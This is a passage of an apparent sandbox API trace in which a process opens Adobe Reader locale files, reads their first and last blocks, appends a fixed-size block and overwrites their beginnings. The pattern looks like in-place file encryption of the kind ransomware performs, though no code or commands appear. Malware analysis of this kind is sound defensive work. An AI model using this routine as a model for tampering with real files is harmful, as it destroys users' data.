WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.659] ReleaseMutex (hMutex=0x168) returned 1 [0073.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.SUO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0073.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.SUO", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.SUO", lpUsedDefaultChar=0x0) returned 11 [0073.659] ReadFile (in: hFile=0x1e8, lpBuffer=0x2874f88, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2874f88*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0073.668] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7c800 [0073.668] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.670] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7c800 [0073.670] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e978a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978a8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.671] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0073.671] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0073.671] CloseHandle (hObject=0x1e8) returned 1 [0073.672] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0073.672] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0073.673] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe1 [0073.673] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0073.673] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.673] ReleaseMutex (hMutex=0x168) returned 1 [0073.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0073.673] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ee71c8, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee71c8*, lpNumberOfBytesRead=0x311f2bc*=0xe1, lpOverlapped=0x0) returned 1 [0073.675] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0073.675] WriteFile (in: hFile=0x1e8, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x669, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x311f2d0*=0x669, lpOverlapped=0x0) returned 1 [0073.675] CloseHandle (hObject=0x1e8) returned 1 [0073.675] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\BRdlang32.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\brdlang32.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0074.984] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0074.984] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3800 [0074.984] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0074.984] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0074.985] ReleaseMutex (hMutex=0x168) returned 1 [0074.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.FRA", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0074.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.FRA", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.FRA", lpUsedDefaultChar=0x0) returned 13 [0074.985] ReadFile (in: hFile=0x1cc, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0074.991] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2800 [0074.991] ReadFile (in: hFile=0x1cc, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0074.992] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2800 [0074.992] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0074.992] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0074.992] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0074.993] CloseHandle (hObject=0x1cc) returned 1 [0074.993] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Multimedia.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\multimedia.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0074.994] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0074.994] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x14400 [0074.994] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0074.994] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0074.994] ReleaseMutex (hMutex=0x168) returned 1 [0074.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.FRA", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0074.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.FRA", cchWideChar=14, lpMultiByteStr=0x1f7342c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.FRA", lpUsedDefaultChar=0x0) returned 14 [0074.995] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0074.996] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x13400 [0074.996] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0074.997] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x13400 [0074.997] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0074.997] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0074.998] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0074.998] CloseHandle (hObject=0x1cc) returned 1 [0074.998] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\SendMail.fra" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\sendmail.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0074.999] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0074.999] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4200 [0074.999] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0074.999] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0074.999] ReleaseMutex (hMutex=0x168) returned 1 [0074.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.fra", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.fra", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.fra", lpUsedDefaultChar=0x0) returned 12 [0074.999] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.001] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3200 [0075.001] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.002] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3200 [0075.002] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.002] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0075.002] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0075.003] CloseHandle (hObject=0x1cc) returned 1 [0075.003] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\AdobeCollabSync.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\adobecollabsync.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0075.004] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0075.004] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a00 [0075.004] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0075.005] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.005] ReleaseMutex (hMutex=0x168) returned 1 [0075.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.HRV", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0075.005] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.HRV", cchWideChar=19, lpMultiByteStr=0x1f88a64, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.HRV", lpUsedDefaultChar=0x0) returned 19 [0075.005] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0075.008] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0075.008] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x311f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0075.008] CloseHandle (hObject=0x1cc) returned 1 [0075.009] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\IA32.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\ia32.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0075.009] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0075.009] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe00 [0075.009] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0075.010] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.010] ReleaseMutex (hMutex=0x168) returned 1 [0075.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.HRV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0075.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.HRV", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.HRV", lpUsedDefaultChar=0x0) returned 8 [0075.010] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0075.012] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0075.012] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0075.012] CloseHandle (hObject=0x1cc) returned 1 [0075.013] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\SaveAsRTF.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\saveasrtf.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0075.013] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0075.013] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4a00 [0075.013] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0075.013] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.014] ReleaseMutex (hMutex=0x168) returned 1 [0075.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.HRV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.HRV", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.HRV", lpUsedDefaultChar=0x0) returned 13 [0075.014] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.016] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3a00 [0075.016] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.016] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3a00 [0075.017] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.017] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0075.017] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0075.017] CloseHandle (hObject=0x1cc) returned 1 [0075.018] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\accessibility.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\accessibility.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0075.018] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0075.019] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb000 [0075.019] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0075.019] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.019] ReleaseMutex (hMutex=0x168) returned 1 [0075.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.HUN", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.HUN", cchWideChar=17, lpMultiByteStr=0x1f88a64, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.HUN", lpUsedDefaultChar=0x0) returned 17 [0075.019] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.021] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa000 [0075.022] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.022] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa000 [0075.022] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 